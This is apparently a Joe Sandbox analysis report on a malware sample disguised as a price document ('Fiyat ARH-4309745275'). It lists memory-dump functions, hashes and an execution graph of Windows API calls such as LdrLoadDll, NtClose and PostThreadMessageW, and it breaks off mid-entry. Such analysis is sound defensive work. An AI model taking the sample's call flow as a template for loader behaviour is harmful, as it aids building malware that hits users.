                  • Source File: 00000000.00000002.1325836132.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_117d000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 00646b546c819de8926cedadd55e834200bf8563cbe25ebb76e6f9b58f62b641
                  • Instruction ID: d9bb58af366d26cb55e1006ccf0d7c112187c9b937b32fcf47b1982baf84e182
                  • Opcode Fuzzy Hash: 00646b546c819de8926cedadd55e834200bf8563cbe25ebb76e6f9b58f62b641
                  • Instruction Fuzzy Hash: 4221F171504248EFDF19DF54E980B26BFB5FF88328F24C569E9090B356C336D456CAA2
                  Function 0118D01C Relevance: .1, Instructions: 72COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1325964081.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_118d000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fb1820e71e5e79db6b34128be7b0206a238776501f17829f7ca5d6d71f55e505
                  • Instruction ID: 193df205195a8c7318fdfdb61ad4b656dc02518e370b67d988e9df25d6aef9b3
                  • Opcode Fuzzy Hash: fb1820e71e5e79db6b34128be7b0206a238776501f17829f7ca5d6d71f55e505
                  • Instruction Fuzzy Hash: 3221D371504304EFDF19EF94E984B16BBA5EB84214F20C56DE8494B286C336D447CE62
                  Function 0118D1D4 Relevance: .1, Instructions: 72COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1325964081.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_118d000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 03dfbfc513bfebfdf00ab3b3db53b4323321aab33144b651e1273dad4b8de5ec
                  • Instruction ID: d3f9baf9a9f3136a90b964c46b491a176f75c8dd9fba86cdc3c1098ffe4fca82
                  • Opcode Fuzzy Hash: 03dfbfc513bfebfdf00ab3b3db53b4323321aab33144b651e1273dad4b8de5ec
                  • Instruction Fuzzy Hash: A821D771504304EFDF19EF94E5C0B26BBA6FB84324F24C56DE9494B292C336D446CE62
                  Function 0117D4BF Relevance: .1, Instructions: 56COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1325836132.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_117d000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                  • Instruction ID: f8edd68e665c637818ca9c690d5e60e942375af728f82a28a9e55f0905f0cddf
                  • Opcode Fuzzy Hash: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                  • Instruction Fuzzy Hash: 7411AF76504284CFDF16CF54E5C4B16BF72FB84328F24C6A9D8490B656C336D456CBA2
                  Function 0118D1CF Relevance: .1, Instructions: 53COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1325964081.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_118d000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                  • Instruction ID: 671093fd41ba5c024a0b59162ed22c8804cac5fbbb148a493994f1068566ef5b
                  • Opcode Fuzzy Hash: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                  • Instruction Fuzzy Hash: F911BB75504280DFDB16DF54D5C4B15BBA2FB84324F24C6AAE8494B296C33AD40ACF62
                  Function 0118D017 Relevance: .1, Instructions: 53COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1325964081.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_118d000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                  • Instruction ID: 4bf2dd7a2339470c173d41f1d4b69c1c355efdeadc9e32aa8d2287e3f35cd9d0
                  • Opcode Fuzzy Hash: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                  • Instruction Fuzzy Hash: AC11BB75508380CFDB16DF54E5C4B16BBA2FB84314F24C6AAD8494B696C33AD40BCFA2
                  Function 0117D759 Relevance: .0, Instructions: 45COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1325836132.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_117d000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 63881e36ff48c50eede2f51ba9bc6c5ba42c79b2f1347b61be4e5ac71ca7edaa
                  • Instruction ID: 915e23e2ec49206f5a9551a0aa29973059f94c0aeda4e9aceab572f5224ad181
                  • Opcode Fuzzy Hash: 63881e36ff48c50eede2f51ba9bc6c5ba42c79b2f1347b61be4e5ac71ca7edaa
                  • Instruction Fuzzy Hash: 2801A7711047889FEB284AA9EC84766FBE8DF41238F18C45AED190A386C3799440CAB2
                  Function 0117D758 Relevance: .0, Instructions: 36COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1325836132.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_117d000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7f015e86ecef6377e476220b024d56c3c47d56cceeca6610fe87c524a725453f
                  • Instruction ID: d4a33ebb29fcb0440bd6191ca6504414a492514029d8fd0e4a3b2147de9ac518
                  • Opcode Fuzzy Hash: 7f015e86ecef6377e476220b024d56c3c47d56cceeca6610fe87c524a725453f
                  • Instruction Fuzzy Hash: 91F062714047849EEB248A5ADC84B62FFA8EF41638F18C45AED584E387C3799844CBB1

                  Non-executed Functions

                  Function 075D6898 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: bQ_>
                  • API String ID: 0-559413283
                  • Opcode ID: 98cdc9f09a49b01557d89690181195e6097a22391031a2b6600fc8e80ec3ee28
                  • Instruction ID: 959d4009230412087d9dccce4f0a001eac3627454b9196c804e09508a58d45e3
                  • Opcode Fuzzy Hash: 98cdc9f09a49b01557d89690181195e6097a22391031a2b6600fc8e80ec3ee28
                  • Instruction Fuzzy Hash: 5EE1E9B4E002198FDB14DFA9C590AAEBBF2FF89304F248169D854AB355D731AD42CF61
                  Function 075DAAE0 Relevance: .4, Instructions: 366COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6e4b987606d4a61a62b55bceb76fd16aa46aacd64e52998bfa4ddb4fd1745367
                  • Instruction ID: 77f836ab40ae71f46a1c8068ed54c4685f1d91b1d674e34c7f38f2026d9f03bc
                  • Opcode Fuzzy Hash: 6e4b987606d4a61a62b55bceb76fd16aa46aacd64e52998bfa4ddb4fd1745367
                  • Instruction Fuzzy Hash: 71D158B17016068FDB29DB79C450BAFB7EAAFC9600F14846ED1469B2A0DB35ED02CB51
                  Function 075D5FC0 Relevance: .3, Instructions: 312COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7d66b46d65ad7c025ba7134167006a4bc3e4a87189b37f524cd99decba3f5f82
                  • Instruction ID: 6cc90b870a0980157298501f491a85b8db1a9b9ec4565df7d71266e943b8a7e3
                  • Opcode Fuzzy Hash: 7d66b46d65ad7c025ba7134167006a4bc3e4a87189b37f524cd99decba3f5f82
                  • Instruction Fuzzy Hash: E0E1FAB4E002198FDB14DFA9C590AAEBBF2FF89304F248159D415AB355D771AD42CF60
                  Function 075D5B88 Relevance: .3, Instructions: 312COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d95118c15ddf8fe37aefa20e8d6e81a8e715622e052650b8b6984a28d6080b3d
                  • Instruction ID: 657b2c2e0c016d600f8c9d7cc34f0c885266ca143698e6642cc5d29968a17fe6
                  • Opcode Fuzzy Hash: d95118c15ddf8fe37aefa20e8d6e81a8e715622e052650b8b6984a28d6080b3d
                  • Instruction Fuzzy Hash: ACE1E8B4E002198FDB14DFA9C590AAEBBF2FF89305F24816AD814AB355D731AD41CF61
                  Function 075D48E8 Relevance: .3, Instructions: 312COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fdf22801c7ff6b08cdecc13afde10e5f9ef9601514a5d72375cf2766ee2e26bd
                  • Instruction ID: 786fd392df1f2ef95053695d6749789395469a0b3066c4d1ac717be414a09ed6
                  • Opcode Fuzzy Hash: fdf22801c7ff6b08cdecc13afde10e5f9ef9601514a5d72375cf2766ee2e26bd
                  • Instruction Fuzzy Hash: 80E1D7B4E002598FDB14DFA9C590AAEBBF2FF89304F24856AD814AB355D731AD41CF60
                  Function 075D44B0 Relevance: .3, Instructions: 312COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6f7533a628a3245c93747dc250a53ac497d54c0773a814bdadf5954de2c131d5
                  • Instruction ID: e5d852c3d3040059c14c5707556e21506b04aebeb4667092aa94e3addef56965
                  • Opcode Fuzzy Hash: 6f7533a628a3245c93747dc250a53ac497d54c0773a814bdadf5954de2c131d5
                  • Instruction Fuzzy Hash: B9E1F8B4E002598FDB14DFA9C580AAEBBF2FF89304F24816AD815AB355D731AD41CF61
                  Function 011DD4FC Relevance: .3, Instructions: 264COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1326462522.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_11d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d630ffb7e87bbff083671a04f63abc2d3199dd7251d433c90d548a5952b726e3
                  • Instruction ID: e03738d30eabd367499d2af32f93db62e037f4d2b743a9230239fc452926b02e
                  • Opcode Fuzzy Hash: d630ffb7e87bbff083671a04f63abc2d3199dd7251d433c90d548a5952b726e3
                  • Instruction Fuzzy Hash: 43A17236E0061A8FCF19DFB4D8445DEB7B2FF85304B15856AE906AB255DB31DA07CB40
                  Function 075D44A0 Relevance: .1, Instructions: 135COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4dfd723613fc537a73539a44888895987185c3174ad41cdfa5ef93cef457bf44
                  • Instruction ID: 955b96845e7c15324fc1ed4b6e78a61d3d62ec517b9528f200ef731f0676fa61
                  • Opcode Fuzzy Hash: 4dfd723613fc537a73539a44888895987185c3174ad41cdfa5ef93cef457bf44
                  • Instruction Fuzzy Hash: 8B51F6B4E002598FDB14DFA9C5845AEBBF2FF89304F24816AD818AB256D7319941CFA1

                  Execution Graph

                  Execution Coverage:1.1%
                  Dynamic/Decrypted Code Coverage:5.3%
                  Signature Coverage:8.4%
                  Total number of Nodes:131
                  Total number of Limit Nodes:7
                  execution_graph 95563 424243 95564 42425f 95563->95564 95565 424287 95564->95565 95566 42429b 95564->95566 95568 42b463 NtClose 95565->95568 95573 42b463 95566->95573 95569 424290 95568->95569 95570 4242a4 95576 42d473 RtlAllocateHeap 95570->95576 95572 4242af 95574 42b480 95573->95574 95575 42b491 NtClose 95574->95575 95575->95570 95576->95572 95577 42aa83 95578 42aaa0 95577->95578 95581 1b12df0 LdrInitializeThunk 95578->95581 95579 42aac8 95581->95579 95705 42e433 95706 42e443 95705->95706 95707 42e449 95705->95707 95708 42d433 RtlAllocateHeap 95707->95708 95709 42e46f 95708->95709 95710 4245d3 95714 4245e2 95710->95714 95711 424629 95712 42d353 RtlFreeHeap 95711->95712 95713 424639 95712->95713 95714->95711 95715 42466a 95714->95715 95717 42466f 95714->95717 95716 42d353 RtlFreeHeap 95715->95716 95716->95717 95718 1b12b60 LdrInitializeThunk 95582 413ec3 95583 413edd 95582->95583 95588 417893 95583->95588 95585 413efb 95586 413f40 95585->95586 95587 413f2f PostThreadMessageW 95585->95587 95587->95586 95589 4178b7 95588->95589 95590 4178be 95589->95590 95591 417901 LdrLoadDll 95589->95591 95590->95585 95591->95590 95592 41dfe3 95593 41e009 95592->95593 95597 41e0f7 95593->95597 95598 42e563 95593->95598 95595 41e09b 95595->95597 95604 42aad3 95595->95604 95599 42e4d3 95598->95599 95601 42e530 95599->95601 95608 42d433 95599->95608 95601->95595 95602 42e50d 95611 42d353 95602->95611 95605 42aaf0 95604->95605 95620 1b12c0a 95605->95620 95606 42ab1c 95606->95597 95614 42b773 95608->95614 95610 42d44e 95610->95602 95617 42b7c3 95611->95617 95613 42d36c 95613->95601 95615 42b790 95614->95615 95616 42b7a1 RtlAllocateHeap 95615->95616 95616->95610 95618 42b7e0 95617->95618 95619 42b7f1 RtlFreeHeap 95618->95619 95619->95613 95621 1b12c11 95620->95621 95622 1b12c1f LdrInitializeThunk 95620->95622 95621->95606 95622->95606 95719 41aed3 95720 41af17 95719->95720 95721 41af38 95720->95721 95722 42b463 NtClose 95720->95722 95722->95721 95623 401ac5 95624 401af0 95623->95624 95624->95624 95627 42e8f3 95624->95627 95630 42cf43 95627->95630 95631 42cf69 95630->95631 95642 407573 95631->95642 95633 42cf7f 95641 401b51 95633->95641 95645 41ace3 95633->95645 95635 42cf9e 95639 42cfb3 95635->95639 95660 42b813 95635->95660 95638 42cfc2 95640 42b813 ExitProcess 95638->95640 95656 427503 95639->95656 95640->95641 95663 4165c3 95642->95663 95644 407580 95644->95633 95646 41ad0f 95645->95646 95674 41abd3 95646->95674 95649 41ad54 95651 41ad70 95649->95651 95654 42b463 NtClose 95649->95654 95650 41ad3c 95652 41ad47 95650->95652 95653 42b463 NtClose 95650->95653 95651->95635 95652->95635 95653->95652 95655 41ad66 95654->95655 95655->95635 95657 42755d 95656->95657 95658 42756a 95657->95658 95685 4183e3 95657->95685 95658->95638 95661 42b830 95660->95661 95662 42b841 ExitProcess 95661->95662 95662->95639 95664 4165da 95663->95664 95666 4165f3 95664->95666 95667 42bec3 95664->95667 95666->95644 95669 42bedb 95667->95669 95668 42beff 95668->95666 95669->95668 95670 42aad3 LdrInitializeThunk 95669->95670 95671 42bf54 95670->95671 95672 42d353 RtlFreeHeap 95671->95672 95673 42bf6d 95672->95673 95673->95666 95675 41abed 95674->95675 95679 41acc9 95674->95679 95680 42ab73 95675->95680 95678 42b463 NtClose 95678->95679 95679->95649 95679->95650 95681 42ab8d 95680->95681 95684 1b135c0 LdrInitializeThunk 95681->95684 95682 41acbd 95682->95678 95684->95682 95687 4183f6 95685->95687 95686 41887b 95686->95658 95687->95686 95693 413ff3 95687->95693 95689 41851a 95689->95686 95690 42d353 RtlFreeHeap 95689->95690 95691 418532 95690->95691 95691->95686 95692 42b813 ExitProcess 95691->95692 95692->95686 95695 414012 95693->95695 95694 414130 95694->95689 95695->95694 95697 413a43 95695->95697 95700 42b6e3 95697->95700 95701 42b6fd 95700->95701 95704 1b12c70 LdrInitializeThunk 95701->95704 95702 413a65 95702->95694 95704->95702 95723 418a98 95724 42b463 NtClose 95723->95724 95725 418aa2 95724->95725

                  Executed Functions

                  Function 00417893 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 101 417893-4178bc call 42e053 104 4178c2-4178d0 call 42e573 101->104 105 4178be-4178c1 101->105 108 4178e0-4178f1 call 42ca13 104->108 109 4178d2-4178dd call 42e813 104->109 114 4178f3-417907 LdrLoadDll 108->114 115 41790a-41790d 108->115 109->108 114->115
                  APIs
                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417905
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_Fiyat ARH-4309745275.jbxd
                  Yara matches
                  Similarity
                  • API ID: Load
                  • String ID:
                  • API String ID: 2234796835-0
                  • Opcode ID: ebd3c5d2265a916cd2496e5eef1ce8dc7d6870324b8f3176294337ca5bb7e159
                  • Instruction ID: 0a139a47e173eaad41d0b07f10b71808cd494ea23b68c50335989f7951ff83c9
                  • Opcode Fuzzy Hash: ebd3c5d2265a916cd2496e5eef1ce8dc7d6870324b8f3176294337ca5bb7e159
                  • Instruction Fuzzy Hash: 4E015EB1E0020DBBDF10EAE1DC42FDEB778AB14308F00819AE90897240F675EB588B95
                  Function 0042B463 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 122 42b463-42b49f call 404923 call 42c523 NtClose
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_Fiyat ARH-4309745275.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close
                  • String ID:
                  • API String ID: 3535843008-0
                  • Opcode ID: 024f7506f13a32ece6b1676215f5119d665d863506ea31102a3387a4627870a5
                  • Instruction ID: cc1e1af18163018d145a0d33b3d19fc0af47ca19ac32231b8af92158e85f1dff
                  • Opcode Fuzzy Hash: 024f7506f13a32ece6b1676215f5119d665d863506ea31102a3387a4627870a5
                  • Instruction Fuzzy Hash: 2AE04F726012547BD620EA6ADC41F9F776CDBC5715F404429FA0CA7142CA74B91186A4
                  Function 01B12B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: a9c7ca4fcfdb6361e0d302adceef5de609cd4d7ba53e72aa0b15afe19664ecf9
                  • Instruction ID: f512391be52f8c636bb012519316aab410cd52bf154713c73c763b2b51f963e6
                  • Opcode Fuzzy Hash: a9c7ca4fcfdb6361e0d302adceef5de609cd4d7ba53e72aa0b15afe19664ecf9
                  • Instruction Fuzzy Hash: CA90026220241003410971584415616404A97E1201B55C161E1054591DCA2589956225
                  Function 01B12DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: b0591144dd1373beffe5e07af991607a954a78983cd102911fd25d03aa6e62ce
                  • Instruction ID: df509fc730d78f8a34e3a874226ba31dcc719a44ee2ef1f48d8920d5e56176b8
                  • Opcode Fuzzy Hash: b0591144dd1373beffe5e07af991607a954a78983cd102911fd25d03aa6e62ce
                  • Instruction Fuzzy Hash: 9990023220141413D11571584505707004997D1241F95C552E0464559DDB568A56A221
                  Function 01B12C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: f748c7e7bbc9fc01507dc122cbc28040165ec23bdb7ceabfbb1552b4f390c727
                  • Instruction ID: 9bc0e596b8f4c9e11233e038618307a111763c1990638164b3cd90a9e5d74023
                  • Opcode Fuzzy Hash: f748c7e7bbc9fc01507dc122cbc28040165ec23bdb7ceabfbb1552b4f390c727
                  • Instruction Fuzzy Hash: 3790023220149802D1147158840574A004597D1301F59C551E4464659DCB9589957221
                  Function 01B135C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: e778b4bd82d153b5967c05e9d9c4c8a8069cb767c125642cd38fd884ec95482e
                  • Instruction ID: 1d39eaac77d56b1239633770f6fc47f16e8e643da90811894e3d1c38bbea2066
                  • Opcode Fuzzy Hash: e778b4bd82d153b5967c05e9d9c4c8a8069cb767c125642cd38fd884ec95482e
                  • Instruction Fuzzy Hash: 3090023260551402D10471584515706104597D1201F65C551E0464569DCB958A5566A2
                  Function 00413DF1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                  Download Yara Rule

                  Control-flow Graph

                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_Fiyat ARH-4309745275.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 7454168B$7454168B
                  • API String ID: 0-2062695193
                  • Opcode ID: 9fbef162f4b4a14f8d2e2c362b3a071e4f58e2bfdfd9c824d60b6a1d41156583
                  • Instruction ID: 33df3f10e50ff8a84b2dd90542786e367f1cea822781abc0421f895828f9012d
                  • Opcode Fuzzy Hash: 9fbef162f4b4a14f8d2e2c362b3a071e4f58e2bfdfd9c824d60b6a1d41156583
                  • Instruction Fuzzy Hash: 1C115BB6D0035876D702EBE48C82DEEB77C9B81344F4580A5F900AB242C63C8E4387A5
                  Function 00413E48 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • PostThreadMessageW.USER32(7454168B,00000111,00000000,00000000), ref: 00413F3A
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_Fiyat ARH-4309745275.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessagePostThread
                  • String ID: 7454168B$7454168B
                  • API String ID: 1836367815-2062695193
                  • Opcode ID: 87bf6aeb18af4ce73bdb4161bdea6bf8d0f4a00d99e452a21a40984fd4dab32d
                  • Instruction ID: b9c09223bc78e0d71d65946f2e3709651324493d7ae557fee3cf1ade0007dd7a
                  • Opcode Fuzzy Hash: 87bf6aeb18af4ce73bdb4161bdea6bf8d0f4a00d99e452a21a40984fd4dab32d
                  • Instruction Fuzzy Hash: 1F1104B2E40258BBDB019BA09C81DEF777CDF81358B4580AAF904BB241D6785F478BA1
                  Function 00413EBB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 30 413ebb-413ed5 31 413edd-413f2d call 42de03 call 417893 call 404893 call 4246e3 30->31 32 413ed8 call 42d3f3 30->32 42 413f4d-413f53 31->42 43 413f2f-413f3e PostThreadMessageW 31->43 32->31 43->42 44 413f40-413f4a 43->44 44->42
                  APIs
                  • PostThreadMessageW.USER32(7454168B,00000111,00000000,00000000), ref: 00413F3A
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_Fiyat ARH-4309745275.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessagePostThread
                  • String ID: 7454168B$7454168B
                  • API String ID: 1836367815-2062695193
                  • Opcode ID: 49413a200532d4a212613a90e1414bee851342012923d8c76184ee4e3fe99309
                  • Instruction ID: e529bda212cb015b1356e0af7e23d4eb82a34ef9c3b0b4a674708c5262d7881d
                  • Opcode Fuzzy Hash: 49413a200532d4a212613a90e1414bee851342012923d8c76184ee4e3fe99309
                  • Instruction Fuzzy Hash: BA0108B2D0025C7AEB10ABD18C81DEFBB7CDF40794F448069FA0477241D6785F068BA1
                  Function 00413EC3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • PostThreadMessageW.USER32(7454168B,00000111,00000000,00000000), ref: 00413F3A
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_Fiyat ARH-4309745275.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessagePostThread
                  • String ID: 7454168B$7454168B
                  • API String ID: 1836367815-2062695193
                  • Opcode ID: 537b35400ce6796e681fdafa769aa210e0aa3690fcb74ac34eebb090422fd416
                  • Instruction ID: ccc3fcebc50fd798af19e781a12fc22c9293f22c44f34a6dac6323ea4733d3cc
                  • Opcode Fuzzy Hash: 537b35400ce6796e681fdafa769aa210e0aa3690fcb74ac34eebb090422fd416
                  • Instruction Fuzzy Hash: 0E01C4B2D0025C7ADB11AAE19C81DEF7B7CDF41698F4480A9FA04B7241D6784F0687A2
                  Function 0042B7C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 69 42b7c3-42b807 call 404923 call 42c523 RtlFreeHeap
                  APIs
                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B802
                  Strings
